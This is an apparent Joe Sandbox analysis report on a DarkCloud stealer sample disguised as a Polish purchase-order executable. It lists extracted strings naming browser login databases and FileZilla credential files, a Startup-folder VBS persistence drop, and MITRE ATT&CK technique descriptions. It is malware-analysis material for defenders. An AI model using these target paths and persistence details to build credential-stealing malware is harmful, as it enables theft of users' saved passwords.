\User Data, xrefs: 0040FEC1, 00410869
Profiles, xrefs: 00410BDA
D`C, xrefs: 00410D08
D`C, xrefs: 00410D5D
nFsGseMmyZunH, xrefs: 0041063C, 00410948
472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E, xrefs: 0040FC69, 0040FF75
D`C, xrefs: 0040FF57
D`C, xrefs: 0041115A
@`C, xrefs: 00410C92
S, xrefs: 004112CB
\User Data\Default\Login Data, xrefs: 00410231, 00410585
D`C, xrefs: 00410498
D`C, xrefs: 004111AF
25024147984E81B5507F19, xrefs: 00410611, 0041091D
@`C, xrefs: 00410889

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 25024147984E81B5507F19$472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E$@`C$@`C$@`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$Profiles$S$\Profiles$\User Data$\User Data\Default\Login Data$dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr$nFsGseMmyZunH
API String ID: 0-3923499575
Opcode ID: 82ce321a7de386425c7e3cbf33b448a84910996f78d24a88f0ec54a7b16f2f6f
Instruction ID: 72bdda652b288cbd3f7b33b9543f3f96075f47888fb29e23a9d32a5a4589bec7
Opcode Fuzzy Hash: 82ce321a7de386425c7e3cbf33b448a84910996f78d24a88f0ec54a7b16f2f6f
Instruction Fuzzy Hash: DDC2F670A01219DFDB28CF54DD84BEAB7B5FB49304F1081EAE50AA7260DB749AC5CF58

Function 00421370 Relevance: 21.9, Strings: 17, Instructions: 698COMMON

Download Yara Rule

Strings

9B1370AF88DF7D9F2D5880C6AB, xrefs: 0042156A
pNMVvtaVtexYbPMtyJzeHLiUSrQPbti, xrefs: 00421595
85F18CEE61, xrefs: 00421A7A
9797C05608, xrefs: 00421BEC
wkOsWMxMTdpbHTOlCeHoFuw, xrefs: 0042195A
ADDB3BF21C08BFD9EFE11C9B, xrefs: 00421E57
C3CDC4CDD73DC0FB294B01, xrefs: 00421718
HyRijCXkiBvKeOQrVnMFrHSOywdzEJYl, xrefs: 00421C3E
C:\\, xrefs: 004213F0
KSeBjZidyEiTR, xrefs: 00421ACC
VCmPToogMvVqholQAcQNRTjscqKvubFag, xrefs: 00421D89
UwmyZoFgnbZqUWmUoBpuXjIIAQeHcXEI, xrefs: 00421F7B
DF80794938E48C9D, xrefs: 00421908
D01A53BC8BD3377EABCB55A540B537A94AFB46965C87, xrefs: 00421D5E
D6DEE05D017A99C01A0D4613F45AF873BB3CCAC3F3, xrefs: 00421F50
JksUIaYpbsPukBsLDdqpDbTLutqbMPdgJ, xrefs: 00421E82
aiNjaibSUhxItmNtKgTVKyVOwDiTNdzA, xrefs: 00421743

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_421000_InstallUtil.jbxd

Similarity

API ID:
String ID: 85F18CEE61$9797C05608$9B1370AF88DF7D9F2D5880C6AB$ADDB3BF21C08BFD9EFE11C9B$C3CDC4CDD73DC0FB294B01$C:\\$D01A53BC8BD3377EABCB55A540B537A94AFB46965C87$D6DEE05D017A99C01A0D4613F45AF873BB3CCAC3F3$DF80794938E48C9D$HyRijCXkiBvKeOQrVnMFrHSOywdzEJYl$JksUIaYpbsPukBsLDdqpDbTLutqbMPdgJ$KSeBjZidyEiTR$UwmyZoFgnbZqUWmUoBpuXjIIAQeHcXEI$VCmPToogMvVqholQAcQNRTjscqKvubFag$aiNjaibSUhxItmNtKgTVKyVOwDiTNdzA$pNMVvtaVtexYbPMtyJzeHLiUSrQPbti$wkOsWMxMTdpbHTOlCeHoFuw
API String ID: 0-1069223167
Opcode ID: 8ca4eb0b9f90ab8f4d56887f79290c6c92ff3fbcac88bbbc2eec016b7874e418
Instruction ID: a735194c56e18c03e15f579dc3c966891f2764ef8bbf7ba420dc275f8210a093
Opcode Fuzzy Hash: 8ca4eb0b9f90ab8f4d56887f79290c6c92ff3fbcac88bbbc2eec016b7874e418
Instruction Fuzzy Hash: F672F871A00229DFDB24DF60DD88BDEB7B5BB45300F1081EAE14AB62A0DB745B89CF55

Function 00412B9C Relevance: 19.6, Strings: 15, Instructions: 816COMMON

Download Yara Rule

Strings

Server, xrefs: 00413963, 00414687
8`C, xrefs: 004143A8
===============DARKCLOUD===============, xrefs: 00414384, 00415031
KoezDrmoKPHeEzPfjPLmykT, xrefs: 00414238, 00414F3A
B5A7C66222988DA08583664FF6AE6539A4DFAF9640B4FE, xrefs: 00414216
8`C, xrefs: 00415055
\accounts.xml, xrefs: 00412C53, 00412D89
\recentservers.xml, xrefs: 00413736, 0041386B
\sitemanager.xml, xrefs: 00414459, 0041458F
8`C, xrefs: 00414328
8`C, xrefs: 00414FEA
5C4BD25989C6FFAE9782B5, xrefs: 004141F4, 00414F18
NIrSDPxhaTsnqhcSUFyyssZRYJIiqXi, xrefs: 00414265
%, xrefs: 0041507E
Application : FileZilla, xrefs: 00414FB4

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: %$5C4BD25989C6FFAE9782B5$8`C$8`C$8`C$8`C$===============DARKCLOUD===============$Application : FileZilla$B5A7C66222988DA08583664FF6AE6539A4DFAF9640B4FE$KoezDrmoKPHeEzPfjPLmykT$NIrSDPxhaTsnqhcSUFyyssZRYJIiqXi$Server$\accounts.xml$\recentservers.xml$\sitemanager.xml
API String ID: 0-2579191455
Opcode ID: 263f5e7c9f39ecc598fc8119ec0d8dc3694bbb30e5d6758ed03d7bc864679dc3
Instruction ID: d58d6f54b311898eb1a56cc9a5ed586f3a8eaccb5789cc9359284e9dd1154c39
Opcode Fuzzy Hash: 263f5e7c9f39ecc598fc8119ec0d8dc3694bbb30e5d6758ed03d7bc864679dc3
Instruction Fuzzy Hash: E1823974900219DFCB14DF94DE88BEEB7B5FB48301F1081AAE50AB72A0DB745A85CF59

Function 00421368 Relevance: 6.5, Strings: 5, Instructions: 261COMMON

Download Yara Rule

Strings

pNMVvtaVtexYbPMtyJzeHLiUSrQPbti, xrefs: 00421595
9B1370AF88DF7D9F2D5880C6AB, xrefs: 0042156A
aiNjaibSUhxItmNtKgTVKyVOwDiTNdzA, xrefs: 00421743
C3CDC4CDD73DC0FB294B01, xrefs: 00421718
C:\\, xrefs: 004213F0

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_421000_InstallUtil.jbxd

Similarity

API ID:
String ID: 9B1370AF88DF7D9F2D5880C6AB$C3CDC4CDD73DC0FB294B01$C:\\$aiNjaibSUhxItmNtKgTVKyVOwDiTNdzA$pNMVvtaVtexYbPMtyJzeHLiUSrQPbti
API String ID: 0-1739479764
Opcode ID: 09610ad469b527df13d5ee3252b2a3eb8085fe0d9dd1b474842467d1e9199cde
Instruction ID: e120c0054c2072d6e3b4f2027ad89659d3efd77a5ccac1f6f61c1ef999edc024
Opcode Fuzzy Hash: 09610ad469b527df13d5ee3252b2a3eb8085fe0d9dd1b474842467d1e9199cde
Instruction Fuzzy Hash: 60C1E871A00218DFDB24DF60DD88BDEB7B5BB49300F1082E9E14AB72A0DB745A89CF55

Function 00421000 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr, xrefs: 00421145
471CA6E8B796C5B9A2ECD6C6F82794, xrefs: 00421123

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_421000_InstallUtil.jbxd

Similarity

API ID:
String ID: 471CA6E8B796C5B9A2ECD6C6F82794$dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr
API String ID: 0-4158014271
Opcode ID: 1a6cfcf8d0d568547759f334940029c6dbef1a7fb88084f793d5b2525af39d8e
Instruction ID: f33d5e1814fafd5c1a49b2de3526110b42ecfa43cbd41680f9895a86559d4e75
Opcode Fuzzy Hash: 1a6cfcf8d0d568547759f334940029c6dbef1a7fb88084f793d5b2525af39d8e
Instruction Fuzzy Hash: C381EC75900218DFCB14DFE4DD84ADEB7B9FB48304F1082AAE50ABB264DB745A89CF54

Function 0040442C Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

`A@, xrefs: 00404437

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: `A@
API String ID: 0-673721830
Opcode ID: 94d6f310b63855d0b417b0b0b5bdd120becbea6eec6963e21c4e820a72aba0ce
Instruction ID: d29ed60e7c452a5e83ec58b7aa82cda18296bb0457955b68de3cd3d88df6d976
Opcode Fuzzy Hash: 94d6f310b63855d0b417b0b0b5bdd120becbea6eec6963e21c4e820a72aba0ce
Instruction Fuzzy Hash: 7BB012F03A4003FAD60092A45C0262411D0A6C07813308C33E140E21E0D778CD00813D

Function 0041D001 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3304177579.000000000041D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_41d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7af260271e2b0f2e9d69fb55a8f746c2c7dc68dc56fe316d059e169eac15835d
Instruction ID: cc18803c5d7326afb06fac4b2a8d92f9a13df74a180e30ad9e68a73fde6ec389
Opcode Fuzzy Hash: 7af260271e2b0f2e9d69fb55a8f746c2c7dc68dc56fe316d059e169eac15835d
Instruction Fuzzy Hash: 46C048B58042289FCB699F10D9986E8BA74BB48700F9189E9A30DA5110CB780BC9AF49

Non-executed Functions

Function 00416EEA Relevance: 6.6, Strings: 5, Instructions: 337COMMON

Download Yara Rule

Strings

cholericnessmMNjMwhZdmkLhargfireling, xrefs: 00418913
Q, xrefs: 00418950
sophisticismXaxWpqrhpdzwfirebirds, xrefs: 00418828
getstringvalue, xrefs: 00417166
sophianTeeeXhzEcuLxWPCsoHZZnbhmTxCvMMFzztwfissureless, xrefs: 00418704

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: Q$cholericnessmMNjMwhZdmkLhargfireling$getstringvalue$sophianTeeeXhzEcuLxWPCsoHZZnbhmTxCvMMFzztwfissureless$sophisticismXaxWpqrhpdzwfirebirds
API String ID: 0-1251005525
Opcode ID: ebda0ce9d8b569b63ce15e2beaa018deef96e3544e845884fbd34e62494328b8
Instruction ID: 3aa5f1c094bb368f1c458e2482be4d7a2c944fcdd163251422557095324ecde7
Opcode Fuzzy Hash: ebda0ce9d8b569b63ce15e2beaa018deef96e3544e845884fbd34e62494328b8
Instruction Fuzzy Hash: FB02C2B49002198FDB54CF54C988BDDB7B1BB48304F1086EAD509AB391DB75AEC6CF94

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000000.2054917962.0000000000C78000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNsrnqjr.exe0 vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNsrnqjr.exe0 vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebolewort.exe vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebolewort.exe vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLwmonhiauc.dll" vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2111378125.000000000116E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2122259348.00000000069C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLwmonhiauc.dll" vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Binary or memory string: OriginalFilenameNsrnqjr.exe0 vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DarkCloud

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\FieldNames.exe

C:\Users\user\AppData\Roaming\FieldNames.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfirebirdULzauCAPrOnmUabaculus

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre